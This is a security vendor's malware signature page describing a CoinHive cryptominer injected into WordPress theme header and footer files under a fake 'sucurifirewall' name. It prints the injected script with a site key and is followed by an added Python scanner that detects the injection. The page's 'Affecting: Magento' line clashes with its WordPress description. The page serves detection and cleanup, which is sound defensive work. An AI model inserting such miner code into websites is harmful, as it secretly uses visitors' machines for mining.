SiteCheck Signatures

malware.cryptominer.5

Description:
Website contains an injected CoinHive JavaScript miner library, which pretends to be related to sucurifirewall.

The script can be injected into header.php and footer.php of WordPress themes:

<scr ipt src="https://coinhive[.]com/lib/coinhive.​min.js"></script>
<script>
    var miner = new CoinHive​.User('​wMi7wDDFODxuLxV9S0M32EK0G9czsndP', 'sucurifirewall'); 
    miner​.start();
</script>
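
A check for the injection described above, as an added example that is not part of the original page or of SiteCheck itself: it scans header.php and footer.php under a themes directory for a CoinHive loader tag and miner constructor, stripping zero-width characters before matching. The regular expressions, function names, theme name and placeholder site key are assumptions made for illustration, and the sample input is constructed.

```python
import re
import tempfile
from pathlib import Path

# Invisible characters (zero-width space/joiners, word joiner, BOM) are removed
# before matching so they cannot split the keywords the patterns look for.
INVISIBLE = dict.fromkeys(map(ord, "\u200b\u200c\u200d\u2060\ufeff"))
LOADER = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']([^"']*coinhive[^"']*)["']""", re.I)
MINER = re.compile(
    r"""new\s+CoinHive\s*\.\s*(\w+)\s*\(\s*["']([^"']+)["']\s*(?:,\s*["']([^"']*)["'])?""",
    re.I,
)

def scan_text(text):
    """Return findings for CoinHive loader tags and miner constructors in text."""
    clean = text.translate(INVISIBLE)
    findings = [{"type": "loader", "src": m.group(1)} for m in LOADER.finditer(clean)]
    for m in MINER.finditer(clean):
        findings.append({"type": "miner", "constructor": m.group(1),
                         "site_key": m.group(2), "user": m.group(3)})
    return findings

def scan_themes(themes_dir, names=("header.php", "footer.php")):
    """Scan header.php and footer.php of every theme under themes_dir."""
    report = {}
    for path in sorted(Path(themes_dir).rglob("*.php")):
        if path.name in names:
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

# Constructed sample: placeholder site key, defanged domain, one zero-width space.
SAMPLE = (
    '<script src="https://coinhive[.]com/lib/coinhive.min.js"></script>\n'
    "<script>\n"
    "    var miner = new CoinHive\u200b.User('PLACEHOLDER_SITE_KEY', 'sucurifirewall');\n"
    "    miner.start();\n"
    "</script>\n"
)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp, "themes", "example-theme")  # hypothetical theme name
        theme.mkdir(parents=True)
        (theme / "footer.php").write_text("<?php wp_footer(); ?>\n" + SAMPLE, encoding="utf-8")
        for path, hits in scan_themes(Path(tmp, "themes")).items():
            print(path, hits)
```
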

Affecting: Magento

Mitigation: How to clean a hacked Magento site